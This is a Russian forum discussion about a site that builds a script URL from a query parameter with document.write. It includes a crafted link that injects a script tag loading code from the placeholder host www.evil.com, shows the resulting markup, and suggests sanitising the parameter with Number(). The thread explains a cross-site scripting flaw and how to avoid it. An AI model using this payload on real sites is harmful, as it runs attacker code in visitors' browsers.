а, ну единственная опасность, которую я вижу в таком случае, что кто-то загрузит на сервер свой скрипт (дырявая загрузка файлов на сервер)

вот ссылка для клика:
www.name.ru/index.htm?1.js"></script><script src="http://www.evil.com/script

вот что получится в скрипте:

url = '1.js"></script><script src="http://www.evil.com/script';
document.write('<script TYPE="text/javascript" src="www.name.ru/'+url+'.js"><\/script>')

Итого в документ запишется:

<script TYPE="text/javascript" src="www.name.ru/1.js"></script><script src="http://www.evil.com/script.js"></script>'

однако, прям javascript-injection O_o

да блин, обычный css на фигово разработанных сайтах...
Я же советую человеку не показывать своё невежество и не делать так. зачем городить такую лабуду? Чтобы потом писать 20 строк кода для проверки передаваемого параметра на безопасность?

это

document.write('<script TYPE="text/javascript" src="'+Number(url)+'.js"><\/script>')

на 20 строк не похоже

Это поменьше, я согласен. Но всё равно, такой поход (параметр в строке) говорит о том, что на сайте можно немного поискать и найти ещё пару-тройку ошибок...

ну скажем так, автору пока опасно применять такой подход